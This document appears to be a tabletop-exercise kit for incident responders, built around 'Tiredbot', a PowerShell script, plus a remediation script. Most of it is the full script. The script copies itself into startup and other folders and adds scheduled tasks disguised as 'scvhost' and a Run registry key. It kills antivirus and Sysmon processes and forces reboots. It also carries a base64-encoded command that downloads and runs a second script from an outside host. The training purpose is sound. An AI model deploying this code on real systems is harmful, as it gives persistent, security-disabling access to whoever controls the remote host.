Tiredbot

Red James

Tiredbot is designed to be used for tabletop exercises. This program is not malicious however it may execute malicious behaviour. Tiredbot copies itself to 5 temporary locations, has 2 other persistence mechanisms and respawns every 37 minutes. This means that responders have 37 minutes to remediate all of tiredbots artefacts before the infected pc gets *tired*, reboots and is reinfected on start up.

Table Top Exercise (TTX)

The TTX controller should run tiredbot.ps1 on a virtual machine then close the program.
CIRT should then access the VM, investigate and then attempt to control the infection on the VM.

Objective
  1. Identify 5 tiredbot clones
  2. Identify 2 persistence mechanisms used by tiredbot
  3. Decode base64
  4. Identify C2 url
  5. Write a script to remediate the infection 

 

#tiredbot.ps1#

#Add_to_Start_up
$user = (Get-WMIObject -ClassName Win32_ComputerSystem).Username
try {
Copy-Item "./tiredbot.ps1" -Destination "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"
Copy-Item "./tiredbot.ps1" -Destination "C:\Users\$user\AppData\Local\Microsoft"
Copy-Item "./tiredbot.ps1" -Destination "C:\temp"
Copy-Item "./tiredbot.ps1" -Destination "C:\"
}
catch { "An error occurred." }

#Create_SchTask
try {
$action = New-ScheduledTaskAction -Execute 'Powershell.exe' `

-Argument '-verb runas -ArgumentList "-file C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\tiredbot.ps1"'

$trigger = New-ScheduledTaskTrigger -Daily -At 9am

Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "scvhost" -Description "scvhost daily scheduled task"

$action = New-ScheduledTaskAction -Execute 'Powershell.exe' `

-Argument '-verb runas -ArgumentList "-file C:\Users\$user\AppData\Local\Microsoft\tiredbot.ps1"'

$trigger = New-ScheduledTaskTrigger -Daily -At 9am

Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "scvhost" -Description "scvhost daily scheduled task"

$action = New-ScheduledTaskAction -Execute 'Powershell.exe' `

-Argument '-verb runas -ArgumentList "-file C:\temp\tiredbot.ps1"'

$trigger = New-ScheduledTaskTrigger -Daily -At 9am

Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "scvhost" -Description "scvhost daily scheduled task"

$action = New-ScheduledTaskAction -Execute 'Powershell.exe' `

-Argument '-verb runas -ArgumentList "-file C:\tiredbot.ps1"'

$trigger = New-ScheduledTaskTrigger -Daily -At 9am

Register-ScheduledTask -Action $action -Trigger $trigger -TaskName "scvhost" -Description "scvhost daily scheduled task"
}
catch { "An error occurred." }

powershell.exe -EncodedCommand "JAB1AHIAbAAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBhAGwAdwBhAHkAcwAtAHQAaQAuAHIAZQBkAC8AdABpAHIAZQBkAGIAbwB0AGMAMgAuAHAAcwAxACIADQAKACQAZABlAHMAdAAgAD0AIAAiAGMAOgBcAHQAZQBtAHAAXAB3AGkAbgBkAG8AdwBzAFwAcwBwAGEAdwBuAF
8AdABpAHIAZQBkAGIAbwB0AF8AZgByAG8AbQBfAGMAMgAuAHAAcwAxACIADQAKAEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQByAGkAIAAkAHUAcgBsACAALQBPAHUAdABGAGkAbABlACAAJABkAGUAcwB0AA0ACgBjAGQAIABjADoAXAB0AGUAbQBw
AFwAdwBpAG4AZABvAHcAcwBcAA0ACgAuAFwAcwBwAGEAdwBuAF8AdABpAHIAZQBkAGIAbwB0AF8AZgByAG8AbQBfAGMAMgAuAHAAcwAxAA=="

New-Item -Path Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run -Name tired –Force
Set-Item -Path Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\tired -Value "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\tiredbot.ps1"

#Disable_AV
try {
taskkill /f /im sysmon64.exe
taskkill /f /im confer.exe
taskkill /f /im masvc.exe
taskkill /f /im SemSvc.exe
taskkill /f /im NortonSecurity.exe
taskkill /f /im MgntSvc.exe
taskkill /f /im bdagent.exe
taskkill /f /im Mbam.exe
}
catch { "An error occurred." }

#Timer_Countdown_37_minutes
Start-Sleep -Seconds 2220

Write-Host "**YAAWWWWWWWNNN** I'm Tired! Gooodnight..."
Write-Host "**YAAWWWWWWWNNN** I'm Tired! Gooodnight..."
$i=1
for(;$i -le 10;$i++)
{
Write-Host "zzZZZzzzZZZZzzzzz";
}

Start-Sleep -Seconds 5
Stop-Computer -ComputerName localhost

 

 

 

 

Solution

  1. Remove scvhost schedulded task
  2. Remove HKCU\Software\Microsoft\Windows\CurrentVersion\Run\tired registry key
  3. Remove tiredbot.ps1 clones:
    “C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp”
    “C:\Users\$user\AppData\Local\Microsoft”
    “C:\temp\windows”
    “C:\temp”
    “C:\”

If anyone of these clones are left on the VM at time of Tired reboot, the asset will be reinfected with all the artefacts.

#Tiredbot Antidote#

#Remove_SchTask
Unregister-ScheduledTask -TaskName "scvhost" -Confirm:$false

#Remove_RegKey
Remove-Item -Path HKCU:\Software\Microsoft\Windows\CurrentVersion\Run\tired -Force -Verbose

#Remove_Clones
Remove-Item -Path C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\tiredbot.ps1 -Force
Remove-Item -Path C:\Users\$user\AppData\Local\Microsoft\tiredbot.ps1 -Force
Remove-Item -Path C:\temp\windows\spawn_tiredbot_from_c2.ps1 -Force
Remove-Item -Path C:\temp\tiredbot.ps1 -Force
Remove-Item -Path C:\tiredbot.ps1 -Force